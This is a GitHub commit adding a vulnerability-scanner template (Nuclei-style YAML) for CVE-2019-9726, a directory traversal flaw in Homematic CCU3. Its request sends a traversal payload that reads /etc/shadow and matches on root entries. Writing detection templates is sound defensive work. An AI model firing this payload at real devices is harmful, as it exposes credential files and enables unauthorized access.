Create CVE-2019-9726.yaml

patch-1
Roberto Nunes 2022-02-25 09:08:03 +09:00 committed by GitHub
parent 61f1eb28af
commit fa5bef5265
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

31
CVE-2019-9726.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2019-9726
info:
name: Directory Traversal / Arbitrary File Read in Homematic CCU3
author: 0x_Akoko
severity: high
description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://www.cvedetails.com/cve/CVE-2019-9726
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
tags: cve,cve2019,homsmstic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200